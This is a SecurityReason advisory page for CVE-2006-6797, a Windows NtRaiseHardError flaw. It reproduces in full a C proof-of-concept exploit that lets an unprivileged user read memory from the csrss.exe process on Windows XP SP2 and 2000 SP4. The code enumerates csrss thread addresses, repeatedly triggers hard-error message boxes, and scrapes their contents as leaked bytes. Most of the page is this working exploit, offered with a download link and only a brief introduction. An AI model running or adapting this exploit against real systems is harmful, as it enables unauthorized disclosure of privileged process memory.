|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 2086 CVE : CVE-2006-6797 SecurityRisk : Low  (About) Remote Exploit : No Local Exploit : Yes Exploit Available : Yes Credit : Ruben Santamarta Published : 02.01.2007
Advisory Content : Hi, I have been taking a look at the NtRaiseHardError bug and just for fun I've coded an exploit. Watch out, not for the double free vulnerability (indeed I have not analyzed that piece of code yet) but just relying on NtRaiseHardError internals and how is dispatched a MessageBox with MB_SERVICE_NOTIFICATION parameter enabled... In google groups there are old references for this bug as a DoS.Unprivileged users can exploit that bug in order to read Csrss.exe process memory though. Not a big deal, but curious at least. Tested on XP SP2 and 2K SP4 fully patched. cheers, Rubén. ---------------------------------------------- Direct download http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func =fileinfo&id=43 ///////////////////////////////////////// ///////////////////////////////////////// ///// Microsoft Windows NtRaiseHardError ///// Csrss.exe memory disclosure ///////////////////////////////////////// ///// Ruben Santamarta ///// ruben at reversemode dot com ///// www.reversemode.com ///////////////////////////////////////// ///// 12.27.2006 ///// For educational purposes ONLY ///// Compiled using gcc (Dev-C++) //////////////////////////////////////// #include <stdio.h> #include <windows.h> #include <winbase.h> #include <ntsecapi.h> #define UNICODE #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) #define STATUS_SUCCESS ((NTSTATUS) 0x00000000) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004) #define STATUS_INVALID_PARAMETER ((NTSTATUS) 0xC000000D) #define SystemProcessesAndThreadsInformation 5 #define NTAPI __stdcall int gLen=1; typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS, ULONG, ULONG, PULONG, UINT, PULONG); typedef LONG NTSTATUS; typedef LONG KPRIORITY; typedef struct _CLIENT_ID { DWORD UniqueProcess; DWORD UniqueThread; } CLIENT_ID, * PCLIENT_ID; typedef struct _VM_COUNTERS { SIZE_T PeakVirtualSize; SIZE_T VirtualSize; ULONG PageFaultCount; SIZE_T PeakWorkingSetSize; SIZE_T WorkingSetSize; SIZE_T QuotaPeakPagedPoolUsage; SIZE_T QuotaPagedPoolUsage; SIZE_T QuotaPeakNonPagedPoolUsage; SIZE_T QuotaNonPagedPoolUsage; SIZE_T PagefileUsage; SIZE_T PeakPagefileUsage; } VM_COUNTERS; typedef struct _SYSTEM_THREAD_INFORMATION { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientId; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; LONG State; LONG WaitReason; } SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION; typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved1[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; SYSTEM_THREAD_INFORMATION Threads[5]; } SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION; typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD); ULONG GetCsrssThread() { ULONG cbBuffer = 0x5000; ULONG tPointer; LPVOID pBuffer = NULL; NTSTATUS Status; PCWSTR pszProcessName; DWORD junk; ULONG ThreadCount; int i=0,b=0; PQUERYSYSTEM NtQuerySystemInformation; PSYSTEM_THREAD_INFORMATION pThreads; PSYSTEM_PROCESS_INFORMATION pInfo ; NtQuerySystemInformation = (PQUERYSYSTEM) GetProcAddress( LoadLibrary( "ntdll.dll" ), "NtQuerySystemInformation" ); do { pBuffer = malloc(cbBuffer); if (pBuffer == NULL) { printf(("Not enough memoryn")); break; } Status = NtQuerySystemInformation( SystemProcessesAndThreadsInformation, pBuffer, cbBuffer, NULL); if (Status == STATUS_INFO_LENGTH_MISMATCH) { free(pBuffer); cbBuffer *= 2; } else if (!NT_SUCCESS(Status)) { printf("NtQuerySystemInformation Error! "); free(pBuffer); } } while (Status == STATUS_INFO_LENGTH_MISMATCH); pInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer; for (;;) { if (pInfo->NextEntryDelta == 0) break; if(pInfo->ProcessName.Buffer!=NULL && !wcsicmp(pInfo->ProcessName.Buffer,L"csrss.exe")) { printf("n[%ws] nn", pInfo->ProcessName.Buffer); printf("5 addresses for testing purposesnn"); for(b=0;b<5;b++) { printf("Thread %d -> 0x%xn",b,pInfo->Threads[b].StartAddress); } tPointer=(ULONG)pInfo->Threads[1].StartAddress; } pInfo = (PSYSTEM_PROCESS_INFORMATION)(((PUCHAR)pInfo) + pInfo->NextEntryDelta); } free(pBuffer); return tPointer; } VOID WINAPI ReadBox( LPVOID param ) { HWND hWindow,hButton,hText; int i=0,b=0; int gTemp; char lpTitle[300]; char lpText[300]; char lpBuff[500]; for (;;) { lpText[0]=(BYTE)""; Sleep(800); hWindow = FindWindow("#32770",NULL); if(hWindow != NULL) { GetWindowText(hWindow,(LPSTR)&lpTitle,250); hText=FindWindowEx(hWindow,0,"static",0); GetWindowText(hText,(LPSTR)&lpText,250); hText=GetNextWindow(hText,GW_HWNDNEXT); GetWindowText(hText,(LPSTR)&lpText,250); gTemp = strlen(lpTitle); if ( gTemp>1 ) gLen = gTemp; else gLen = 1; for(i = 0; i < gTemp; i++) printf("%.2X",(BYTE)lpTitle[i]); SendMessage(hWindow,WM_CLOSE,0,0); ZeroMemory((LPVOID)lpTitle,250); ZeroMemory((LPVOID)lpText,250); ZeroMemory((LPVOID)lpBuff,300); } } } int main() { UNICODE_STRING uStr={5,5,L"fun!"}; ULONG retValue,args[]={0,0,&uStr}; ULONG csAddr; PNTRAISE NtRaiseHardError; int i=0; system("cls"); printf("##########################################n"); printf("### Microsoft Windows NtRaiseHardError ###n"); printf("##### Csrss.exe memory disclosure ######n"); printf("@@@@@ Xmas Exploit - ho ho ho! @@@@@@n"); printf("## Ruben Santamarta www.reversemode.com ##n"); printf("##########################################nn"); NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtRaiseHardError"); csAddr=GetCsrssThread(); args[0]=csAddr; args[1]=csAddr; printf("n[+] Capturing Messages n"); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)ReadBox, 0, 0, NULL); printf("n[+] Now reading at: [0x%p] - Thread 1nn",csAddr); for(;;) { printf("Reading bytes at [0x%p] : ",args[0]); NtRaiseHardError(0x50000018,3,4,args,1,&retValue); if(retValue && gLen<=1) printf("00n"); else printf("n"); args[0]+=gLen; args[1]+=gLen; } }  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |